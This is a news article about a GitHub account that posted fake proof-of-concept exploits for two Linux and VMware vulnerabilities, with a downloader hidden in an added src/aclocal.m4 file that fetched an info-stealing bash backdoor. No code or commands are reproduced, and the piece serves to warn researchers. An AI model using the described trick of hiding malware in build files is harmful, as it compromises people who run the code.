Linux Hacker Exploits Researchers with Fake PoCs Posted to GitHub
A cyber attacker gives defenders a taste of their own medicine, with GitHub honeypots concealing infostealers.
July 14, 2023
A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.
Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous which, perhaps, makes it easier for a bad one to slip through.
Researchers from Uptycs this week outed a GitHub user (now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.
Siddartha Malladi, security researcher at Uptycs, doesn't blame the victims for the egg on their face. "On any bad day, I just might not check every detail," he says about this kind of trap. "I'm not efficient enough to check every line of code every day, right?"
Attackers Attacking Defenders
During regular testing for various common vulnerabilities, the Uptycs researchers came across a suspicious PoC. "On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output," they wrote in their blog post, but running the code triggered "significant irregularities" in their system, including "unexpected network connections, unusual data transfers, and unauthorized system access attempts."
It turned out that what they'd downloaded was a GitHub entry masquerading as a PoC for CVE-2023-35829, a 7.0-rated "high" severity use-after-free vulnerability in the Linux kernel. The contents of the submission were, tellingly, copied almost bit-for-bit from a legitimate PoC for a different vulnerability in the Linux kernel, CVE-2022-34918. The only difference was an additional file — src/aclocal.m4 — acting as a downloader for a Linux bash script. The script contains a backdoor that collects information about the host machine, such as the hostname and username and a list of home directory contents.
The same profile behind that first malicious PoC also published one more, pertaining to CVE-2023-20871, a 7.8 "high" severity privilege escalation vulnerability in the VMware Fusion hypervisor. In everything but name, this second honeypot was identical to the first.
The mastermind behind all of this is GitHub user ChriSanders22. The profile appears to have stolen its bio from another GitHub user, and its profile picture depicts the chess grandmaster Shakhriyar Mamedyarov. Malladi was able to connect the profile with a user on chess.com from the Philippines.
The profile and its malicious PoCs have since been deleted. A GitHub spokesperson informed Dark Reading, "We removed the content in accordance with GitHub's Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms."
A copied version of the fake CVE-2023-35829 PoC is still live. It has been forked 20 times.
What Security Pros Can Do
Neoteric as PoC poisoning may be, hackers have been known to impersonate researchers before. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers' powerful software tools.
Meanwhile, there's not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a "hello, world" program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, "but what can they do? It is a legit thing. That's the problem — even if copying can be detected, the admins cannot do anything about it."
And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.
"We've definitely seen these types of attacks before," Malladi emphasizes. "I want people to understand that this is not stopping in the future."
About the Author
You May Also Like